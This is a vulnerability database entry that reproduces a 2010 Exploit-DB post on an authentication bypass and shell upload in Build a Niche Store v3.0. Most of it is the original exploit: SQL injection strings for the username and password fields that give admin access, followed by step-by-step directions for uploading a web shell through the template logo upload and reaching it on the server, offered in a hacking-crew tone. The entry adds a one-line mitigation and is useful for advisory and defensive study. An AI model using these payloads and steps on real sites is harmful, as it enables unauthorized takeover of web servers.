Build a Niche Store v3.0 (BANS) Authentication Bypass Vulnerability

vendor:

Build a Niche Store

by:

ThunDEr HeaD

7,5

CVSS

HIGH

Authentication Bypass / Shell Upload

287

CWE

Product Name: Build a Niche Store

Affected Version From: 3.0

Affected Version To: 3.0

Patch Exists: NO

Related CWE: N/A

CPE: a:buildanichestore:build_a_niche_store

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Build a Niche Store v3.0 (BANS) Authentication Bypass Vulnerability

Build a Niche Store v3.0 (BANS) is vulnerable to an authentication bypass vulnerability. An attacker can exploit this vulnerability by applying the following details for login: Username: ' or 1=1 or ''=' and Password: ' or 1=1 or ''=' which will redirect the attacker to the admin page. The attacker can also upload a shell by going to the Template Page (http://server/admin/index.php?action=getTemplate) and uploading the shell via the upload logo option. The shell can then be accessed via http://server/themes/layout-3-right/images/

Mitigation:

Ensure that authentication credentials are properly validated and that user input is properly sanitized.

Source

Exploit-DB raw data:

#########################################################################

[+] Exploit Title : Build a Niche Store v3.0 (BANS) Authentication
Bypass Vulnerability
[~] Author : ThunDEr HeaD
[~] Contact : thunderhead10@gmail.com
[~] Date : 13-11-2010
[~] HomePage : www.indishell.in
[~] Price : $49.95
[~] Version : 3.0
[~] Software: http://www.buildanichestore.com/
[~] Vulnerability Style : Authentication Bypass / Shell Upload
[~] Vulnerability Dir : Shell By: themes/

#########################################################################

~~~~~~~~~~~~~~~~~~~~~~~~~[Greetz To]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

              ----==  INDIAN CYBER ARMY ==----

We Are: -[SiLeNtp0is0n]- , stRaNgEr , inX_rOot , NEO H4cK3R , DarkL00k
, G00g!3 W@rr!0r , str1k3r, co0Lt04d , ATUL DWIVEDI ,

Jackh4xor , Th3 RDX
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

~~~~~~~~~~~~~~~~~~~~~~~~~~[EXPLOIT]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

---==[Authentication Bypass]==---

[1] Go to the URL:

    http://server/admin

[2] Apply these details for login:

        Username: ' or 1=1 or ''='
	PassWord: ' or 1=1 or ''='

[3] You will Redirected to Admin page:

[4] Enjoy

---==[Uploading Shell]==---

[1] Before Uploading you Must be Logged in (Admin Panel)

[2] Go To Template Page:

    http://server/admin/index.php?action=getTemplate

[3] Many Layout Options will be appeared, choose any one

[4] Click On upload logo (eg. layout 3 right)

[5] Upload Your Shell

[6] After Uploading type the following link to access your shell

    http://server/themes/layout-3-right/images/

[7] DOne now time to rock \m/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Bug discovered : 13 November 2010

finish(0);
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

#End 0Day#